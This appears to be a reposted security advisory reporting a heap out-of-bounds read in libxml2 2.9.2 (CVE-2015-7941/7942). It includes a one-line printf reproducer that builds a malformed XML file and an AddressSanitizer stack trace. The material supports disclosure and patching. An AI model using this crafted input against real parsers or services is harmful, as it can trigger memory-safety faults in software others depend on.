libxml2 Out of bounds memory access

2015.10.23
Credit: Michal Zalewski
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2015-7941 | CVE-2015-7942
CWE: N/A

Hey, There appears to be an out-of-bounds read in libxml2 (2.9.2). This normally won't cause a crash, but is visible under ASAN or Valgrind. One way to repro would be: $ printf '<!DOCTYPEd[<!ENTITYnSt""><!ENTITY %%nNt"<!ELEMENT<![INCLUDE0"<!ENTITYL%%N;' >test.xml $ ./xmllint_asan test.xml Copy of the test case: http://lcamtuf.coredump.cx/afl/demo/libxml2_oob.xml ==17901==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000ea56 at pc 0x46cfc5 bp 0x7fffffffc420 sp 0x7fffffffc400 READ of size 1 at 0x60300000ea56 thread T0 #0 0x46cfc4 in xmlParseConditionalSections (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x46cfc4) #1 0x46d7b3 in xmlParseMarkupDecl (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x46d7b3) #2 0x4772a3 in xmlParseInternalSubset (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x4772a3) #3 0x48e9b1 in xmlParseDocument (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x48e9b1) #4 0x4abe06 in xmlDoRead (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x4abe06) #5 0x4ac022 in xmlReadFile (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x4ac022) #6 0x40aa34 in parseAndPrintFile (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x40aa34) #7 0x411f43 in main (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x411f43) #8 0x7ffff61fcaf4 in __libc_start_main (/lib64/libc.so.6+0x21af4) #9 0x402f08 (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x402f08) 0x60300000ea56 is located 1 bytes to the right of 21-byte region [0x60300000ea40,0x60300000ea55) allocated by thread T0 here: #0 0x7ffff6f4a6a8 in __interceptor_malloc (/usr/local/lib64/libasan.so.1+0x6d6a8) #1 0x5f6d98 in xmlStrndup (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x5f6d98) #2 0x412e50 in xmlCreateEntity (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x412e50) #3 0x41320a in xmlAddEntity (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x41320a) #4 0x41373a in xmlAddDocEntity (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x41373a) #5 0x725290 in xmlSAX2EntityDecl (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x725290) #6 0x45ae8f in xmlParseEntityDecl (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x45ae8f) #7 0x46d437 in xmlParseMarkupDecl (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x46d437) #8 0x4772a3 in xmlParseInternalSubset (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x4772a3) #9 0x48e9b1 in xmlParseDocument (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x48e9b1) #10 0x4abe06 in xmlDoRead (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x4abe06) #11 0x4ac022 in xmlReadFile (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x4ac022) #12 0x40aa34 in parseAndPrintFile (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x40aa34) #13 0x411f43 in main (/home/lcamtuf/afl/TEST_ASAN/xmllint_asan+0x411f43) #14 0x7ffff61fcaf4 in __libc_start_main (/lib64/libc.so.6+0x21af4) Comment 1

References:

https://bugzilla.gnome.org/show_bug.cgi?id=744980


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top